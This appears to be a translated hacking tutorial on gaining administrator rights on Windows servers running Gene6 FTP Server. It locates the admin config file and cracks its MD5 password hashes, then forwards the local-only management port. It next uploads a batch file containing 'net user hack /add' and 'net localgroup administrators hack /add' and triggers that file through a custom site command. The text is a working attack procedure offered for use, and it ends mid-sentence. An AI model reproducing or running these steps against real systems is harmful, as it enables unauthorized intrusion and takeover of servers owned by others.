Gene6 FTP Server privilege escalation Method

By: Xiaohua
The FTP software Gene6 FTP Server is easy to use and is much more secure than SU.
The default Management port is 8021, which only allows connections from the local computer. You cannot log on to the external computer even if you get a management account.
Like our SU, the SU Management port is 43958.
The account configuration file of Gene6 FTP Server is in: C: Program FilesGene6 FTP ServerRemoteAdminRemote. ini;
If not, manually search for it.
[Server]
IP = 127.0.0.1, 8021 is the local management IP address and default Management port, and the port can be modified.
GrantAllAccessToLocalHost = 0
[Acct = Administrator] managing accounts
Enabled = 1
Rights = 0
Password = 202CB962AC59075B964B07152D234B70 MD5 encryption string for managing account passwords
[Acct = 124] This is a common account. Note that Acct = 124 is not 124, but 24. 1 in 124 represents the first account.
Enabled = 1
Password = C8FFE9A587B126F152ED3D89A146B445 MD5 encryption string, you can crack the plaintext of the Password.
Domain =
RootFolder =
Rights = 0
IPAccessList =
How can we log on to the Management Console after we get the management password? We can use the HTRAN port forwarding function to forward default Management ports to other ports,
Then connect. We have installed a Gene6 FTP Server software locally. then configure the software.
Create a remote FTP Management

Enter the IP address you want to escalate permission
PORT: enter the PORT forwarded by the PORT forwarding tool,
USERNAME and PASSWORD enter the account and PASSWORD information cracked by the account configuration file of the Gene6 FTP Server. Note that the PASSWORD is MD5 encrypted and must be entered in plaintext.
We can connect to it without an accident. We can create a common account.
Here, I will create an account named msnhack with the password "manhack", select the management directory, and configure the permissions in the permission configuration. You can select all of them ..

In this way, we cannot raise the right. Here is our core step.
1. Write a batch file that can execute commands and upload it to the target host.
@ Echo off
Net user hack/add
Net localgroup administrators hack/add
2. Configure the command in site commands.

COMMAND: enter the name of your COMMAND execution. I am writing HACK DESCRIPTTION. This is the description. You can write anything here.
EXECUTE enter the path of your BAT Command Execution file here. That is, the path of the file you just uploaded. Click OK. Now let's take a look at our local account.

There are only two accounts. Now we log on to FTP for permission escalation. Enter the permission escalation command "quote site hack"

200 the Command executed Command is successfully executed.
Let's see if the account is added.

An account with an additional HACK has been assigned the permission to manage the account. The permission has been successfully upgraded.
{This article